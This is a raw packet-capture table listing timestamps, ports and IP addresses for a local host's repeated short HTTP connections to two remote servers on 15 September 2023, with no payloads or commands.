Sep 15, 2023 11:23:27.898736954 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:27.949080944 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949131012 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949210882 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949244022 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949275970 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949307919 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949338913 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949368954 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949399948 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949430943 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949460983 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949493885 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949525118 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949556112 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949585915 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949616909 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949646950 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949677944 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949707985 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949738979 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949769020 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949800968 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949903011 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.949934959 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.988930941 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:27.988945007 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:28.366309881 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:28.366352081 CEST	80	49738	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:28.366416931 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:28.368280888 CEST	49738	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:28.514043093 CEST	49739	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:28.604775906 CEST	80	49739	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:28.604888916 CEST	49739	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:28.605062962 CEST	49739	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:28.605813980 CEST	49739	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:28.711776018 CEST	80	49739	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:28.907624006 CEST	80	49739	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:28.907758951 CEST	80	49739	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:28.907876015 CEST	49739	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:28.909518957 CEST	49739	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:29.039102077 CEST	49740	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:29.129677057 CEST	80	49740	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:29.129755974 CEST	49740	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:29.129913092 CEST	49740	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:29.130645990 CEST	49740	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:29.220475912 CEST	80	49740	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:29.221064091 CEST	80	49740	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:29.479731083 CEST	80	49740	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:29.479790926 CEST	80	49740	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:29.479863882 CEST	49740	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:29.481600046 CEST	49740	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:29.978521109 CEST	49741	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.072328091 CEST	80	49741	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.072539091 CEST	49741	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.072593927 CEST	49741	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.073256016 CEST	49741	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.163474083 CEST	80	49741	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.163830996 CEST	80	49741	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.431041002 CEST	80	49741	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.431092978 CEST	80	49741	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.431152105 CEST	49741	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.432771921 CEST	49741	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.540604115 CEST	49742	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.632433891 CEST	80	49742	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.632659912 CEST	49742	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.632817984 CEST	49742	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.633462906 CEST	49742	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.724550962 CEST	80	49742	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.724720955 CEST	80	49742	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.956063032 CEST	80	49742	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.956134081 CEST	80	49742	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:30.956224918 CEST	49742	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:30.957797050 CEST	49742	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:31.071532011 CEST	49743	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:31.162086010 CEST	80	49743	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:31.162173986 CEST	49743	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:31.162372112 CEST	49743	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:31.163073063 CEST	49743	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:31.252691031 CEST	80	49743	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:31.253417015 CEST	80	49743	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:31.450036049 CEST	80	49743	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:31.450112104 CEST	80	49743	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:31.450197935 CEST	49743	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:31.451997995 CEST	49743	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:31.559145927 CEST	49744	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:31.650109053 CEST	80	49744	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:31.650230885 CEST	49744	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:31.650408983 CEST	49744	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:31.651017904 CEST	49744	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:31.741261005 CEST	80	49744	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:31.741863012 CEST	80	49744	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:31.948887110 CEST	80	49744	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:31.948929071 CEST	80	49744	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:31.948988914 CEST	49744	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:31.950726032 CEST	49744	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:32.077562094 CEST	49745	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:32.168728113 CEST	80	49745	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:32.168859005 CEST	49745	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:32.169025898 CEST	49745	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:32.169725895 CEST	49745	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:32.259959936 CEST	80	49745	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:32.260576963 CEST	80	49745	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:32.756927967 CEST	80	49745	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:32.757008076 CEST	80	49745	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:32.757097960 CEST	49745	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:32.758645058 CEST	49745	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:32.898178101 CEST	49746	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:32.988646030 CEST	80	49746	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:32.988750935 CEST	49746	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:32.989145041 CEST	49746	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:32.989795923 CEST	49746	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:33.079427004 CEST	80	49746	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:33.080060959 CEST	80	49746	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:33.571021080 CEST	80	49746	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:33.571063042 CEST	80	49746	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:33.571146965 CEST	49746	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:33.572808027 CEST	49746	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:33.712116003 CEST	49747	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:33.802439928 CEST	80	49747	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:33.802548885 CEST	49747	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:33.802737951 CEST	49747	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:33.803478003 CEST	49747	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:33.892880917 CEST	80	49747	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:33.893667936 CEST	80	49747	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:34.164578915 CEST	80	49747	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:34.164597034 CEST	80	49747	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:34.164670944 CEST	49747	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:34.166471004 CEST	49747	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:34.297986031 CEST	49748	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:34.389436960 CEST	80	49748	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:34.389506102 CEST	49748	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:34.389700890 CEST	49748	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:34.390306950 CEST	49748	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:34.480448008 CEST	80	49748	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:34.480906963 CEST	80	49748	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:34.730376005 CEST	80	49748	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:34.730393887 CEST	80	49748	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:34.730561018 CEST	49748	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:34.733248949 CEST	49748	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:34.875545025 CEST	49749	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:34.966438055 CEST	80	49749	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:34.966527939 CEST	49749	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:34.966895103 CEST	49749	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:34.967950106 CEST	49749	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:35.057647943 CEST	80	49749	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:35.058593035 CEST	80	49749	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:35.308991909 CEST	80	49749	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:35.309015036 CEST	80	49749	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:35.309192896 CEST	49749	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:35.311953068 CEST	49749	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:35.511820078 CEST	49750	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:35.602323055 CEST	80	49750	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:35.602557898 CEST	49750	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:35.855891943 CEST	49750	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:35.856803894 CEST	49750	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:35.946058035 CEST	80	49750	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:35.946979046 CEST	80	49750	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:36.204210997 CEST	80	49750	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:36.204230070 CEST	80	49750	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:36.204349995 CEST	49750	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:36.515542984 CEST	49750	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:36.651623964 CEST	49751	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:36.742075920 CEST	80	49751	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:36.742285967 CEST	49751	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:36.742427111 CEST	49751	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:36.743036985 CEST	49751	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:36.832788944 CEST	80	49751	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:36.833585024 CEST	80	49751	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.065356016 CEST	80	49751	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.065373898 CEST	80	49751	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.065437078 CEST	49751	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.067106962 CEST	49751	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.200119019 CEST	49752	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.290548086 CEST	80	49752	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.290709972 CEST	49752	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.290780067 CEST	49752	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.291410923 CEST	49752	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.381364107 CEST	80	49752	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.381829023 CEST	80	49752	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.660904884 CEST	80	49752	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.660947084 CEST	80	49752	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.661056042 CEST	49752	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.662591934 CEST	49752	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.788080931 CEST	49753	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.879196882 CEST	80	49753	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.879302025 CEST	49753	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.879481077 CEST	49753	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.880105019 CEST	49753	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:37.970546007 CEST	80	49753	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:37.971076012 CEST	80	49753	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:38.263145924 CEST	80	49753	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:38.263185978 CEST	80	49753	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:38.263324976 CEST	49753	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:38.270170927 CEST	49753	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:38.386945963 CEST	49754	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:38.478094101 CEST	80	49754	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:38.478264093 CEST	49754	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:38.478522062 CEST	49754	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:38.479142904 CEST	49754	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:38.569629908 CEST	80	49754	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:38.570029974 CEST	80	49754	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:38.825108051 CEST	80	49754	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:38.825172901 CEST	80	49754	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:38.825268030 CEST	49754	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:38.826841116 CEST	49754	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:49.201409101 CEST	49755	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:49.309355021 CEST	80	49755	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:49.309451103 CEST	49755	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:49.309616089 CEST	49755	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:49.310206890 CEST	49755	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:49.400142908 CEST	80	49755	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:49.400615931 CEST	80	49755	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:49.621671915 CEST	80	49755	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:49.621694088 CEST	80	49755	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:49.621809006 CEST	49755	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:49.626024008 CEST	49755	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:49.785582066 CEST	49756	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:49.876291990 CEST	80	49756	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:49.876380920 CEST	49756	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:49.876732111 CEST	49756	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:49.877737045 CEST	49756	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:49.966875076 CEST	80	49756	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:49.967999935 CEST	80	49756	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:50.192888021 CEST	80	49756	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:50.192905903 CEST	80	49756	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:50.192979097 CEST	49756	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:50.195696115 CEST	49756	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:50.354077101 CEST	49757	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:50.444979906 CEST	80	49757	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:50.445169926 CEST	49757	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:50.445713043 CEST	49757	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:50.448220968 CEST	49757	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:50.536206961 CEST	80	49757	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:50.538573027 CEST	80	49757	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:50.774121046 CEST	80	49757	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:50.774243116 CEST	80	49757	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:50.774305105 CEST	49757	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:50.776010036 CEST	49757	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:50.883904934 CEST	49758	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:50.975311995 CEST	80	49758	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:50.975466013 CEST	49758	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:50.975744009 CEST	49758	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:50.976878881 CEST	49758	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:51.067084074 CEST	80	49758	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:51.067806005 CEST	80	49758	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:51.285547018 CEST	80	49758	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:51.285610914 CEST	80	49758	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:51.285703897 CEST	49758	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:51.288953066 CEST	49758	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:51.416497946 CEST	49759	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:51.507112026 CEST	80	49759	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:51.507217884 CEST	49759	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:51.507467031 CEST	49759	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:51.508455038 CEST	49759	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:51.597795010 CEST	80	49759	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:51.598962069 CEST	80	49759	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:51.802405119 CEST	80	49759	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:51.802521944 CEST	80	49759	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:51.802669048 CEST	49759	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:51.810981989 CEST	49759	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:52.064994097 CEST	49760	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:52.156378984 CEST	80	49760	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:52.156466007 CEST	49760	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:52.156843901 CEST	49760	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:52.157856941 CEST	49760	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:52.247457027 CEST	80	49760	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:52.248703003 CEST	80	49760	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:52.495292902 CEST	80	49760	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:52.495326996 CEST	80	49760	104.21.87.11	192.168.2.5
Sep 15, 2023 11:23:52.495564938 CEST	49760	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:52.747376919 CEST	49760	80	192.168.2.5	104.21.87.11
Sep 15, 2023 11:23:52.862981081 CEST	49761	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:52.954122066 CEST	80	49761	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:52.954272985 CEST	49761	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:52.979084969 CEST	49761	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:52.980084896 CEST	49761	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:53.070082903 CEST	80	49761	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:53.070862055 CEST	80	49761	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:53.314035892 CEST	80	49761	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:53.314066887 CEST	80	49761	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:53.314218044 CEST	49761	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:53.615082979 CEST	49761	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.484373093 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.575620890 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.575767040 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.576342106 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.577631950 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.667509079 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.667701006 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.668526888 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.668581963 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.668617010 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.668673992 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.668685913 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.668746948 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.668761969 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.668778896 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.668823004 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.668881893 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.668890953 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.668965101 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.669002056 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.669096947 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.669189930 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.669219971 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.669262886 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.669321060 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.759840965 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.759902954 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.759967089 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.760070086 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.760179043 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.760262966 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.760425091 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.760457039 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.760489941 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.760505915 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.760520935 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.760551929 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.760581970 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.760626078 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.760665894 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.760719061 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.760762930 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.760845900 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.760957956 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.761053085 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.761193991 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.761279106 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.803174973 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.803299904 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.851828098 CEST	80	49762	172.67.139.34	192.168.2.5
